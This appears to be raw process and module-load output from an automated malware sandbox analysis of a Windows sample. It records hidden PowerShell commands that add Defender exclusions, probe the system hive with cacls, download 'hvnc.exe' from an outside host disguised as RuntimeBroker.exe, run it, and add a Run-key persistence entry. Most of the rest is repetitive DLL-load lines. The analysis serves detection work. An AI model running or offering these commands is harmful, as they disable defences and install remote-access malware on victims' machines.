            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\cacls.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\cacls.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: fwpuclnt.dllJump to behavior
